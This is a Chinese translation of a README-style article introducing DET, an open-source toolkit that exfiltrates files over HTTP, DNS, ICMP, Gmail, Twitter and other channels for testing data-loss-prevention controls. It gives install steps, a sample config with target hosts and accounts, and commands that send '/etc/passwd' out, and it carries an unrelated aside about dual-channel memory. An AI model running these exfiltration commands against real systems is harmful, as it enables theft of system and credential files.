黑客工具之DET——可扩展的数据渗出工具包

DET是一个概念界定，描述能同时使用单独或多个通道执行数据渗透。

发明此概念的主要目的，就是确定可能的 DLP故障。它永远不应该用来评估敏感数据。

为了创建一个可以插入到任何协议/服务中的通用的具包，从而实施网络监测和数据泄漏预防（DLP）的配置方案，应对不同的数据溢出技术。

(tips:混合双通道是双通道内存中更为高端的一种形式，也是为了保护用户投资而产生的一种内存双通道模式。它通过主板和CPU共同技术支持，可以让CPU同时和不同型号的内存对接，甚至让CPU支持容量不同的两根内存条。)

1.幻灯片

卢布尔雅那大学在今年3月展示了详细的DET幻灯片，幻灯片在此：

https://docs.google.com/presentation/d/11uk6d-xougn3jU1wu4XRM3ZGzitobScSSMUlx0MRTzg/edit#slide=id.p

2.使用示例

ICMP插件：

服务器端：

客户端：

混合双通道（Gmail、Twitter）

服务器端：

客户端：

3.安装

git clone https://github.com/sensepost/DET.git

pip install -r requirements.txt --user

4.配置

为了使用DET，需要配置它并添加适当的参数（如SMTP/IMAP，AES256加密密码等）。此处的配置文件名为：config-sample.json

{

    "plugins": {

        "http": {

            "target": "192.168.1.101",

            "port": 8080

        },

        "google_docs": {

            "target": "192.168.1.101",

            "port": 8080,

        },

        "dns": {

            "key": "google.com",

            "target": "192.168.1.101",

            "port": 53

        },

        "gmail": {

            "username": "dataexfil@gmail.com",

            "password": "ReallyStrongPassword",

            "server": "smtp.gmail.com",

            "port": 587

        },

        "tcp": {

            "target": "192.168.1.101",

            "port": 6969

        },

        "udp": {

            "target": "192.168.1.101",

            "port": 6969

        },

        "twitter": {

            "username": "PaulWebSec",

            "CONSUMER_TOKEN": "XXXXXXXXX",

            "CONSUMER_SECRET": "XXXXXXXXX",

            "ACCESS_TOKEN": "XXXXXXXXX",

            "ACCESS_TOKEN_SECRET": "XXXXXXXXX"

        },

        "icmp": {

            "target": "192.168.1.101"

        }

    },

    "AES_KEY": "THISISACRAZYKEY",

    "sleep_time": 10

}

5.使用

使用帮助

python det.py -h

usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]

              [-L]

Data Exfiltration Toolkit (SensePost)

optional arguments:

  -h, --help  show this help message and exit

  -c CONFIG   Configuration file (eg. '-c ./config-sample.json')

  -f FILE     File to exfiltrate (eg. '-f /etc/passwd')

  -d FOLDER   Folder to exfiltrate (eg. '-d /etc/')

  -p PLUGIN   Plugins to use (eg. '-p dns,twitter')

  -e EXCLUDE  Plugins to exclude (eg. '-e gmail,icmp')

  -L          Server mode

服务器端：

加载每一个插件：

python det.py -L -c ./config.json

只加载Twitter和Gmail模块：

python det.py -L -c ./config.json -p twitter,gmail

加载每一个插件并排除DNS：

python det.py -L -c ./config.json -e dns

客户端：

加载每一个插件：

python det.py -c ./config.json -f /etc/passwd

只加载Twitter和Gmail模块：

python det.py -c ./config.json -p twitter,gmail -f /etc/passwd

加载每一个插件并排除DNS：

python det.py -c ./config.json -e dns -f /etc/passwd

在PowerShell（HTTP模块下）

PS C:Usersuser01Desktop>

PS C:Usersuser01Desktop> . .http_exfil.ps1

PS C:Usersuser01Desktop> HTTP-exfil 'C:pathtofile.exe'

6. 适用模块

目前来讲， DET支持多种协议：

HTTPS  ICMP       DNS        SMTP/IMAP（eg.Gmail） Raw TCP  PowerShell的变形 (HTTP, DNS, ICMP, SMTP)

其他的“服务”：

Google Docs (未认证的)   Twitter (直接信息)

实验模块

到目前为止，正忙着实现的新模块，包括：

Skype (95% )   Tor (80%)     Github (30/40% )

本文由漏洞银行（BUGBANK.cn)小编  柠檬 翻译，源文译自 github.com。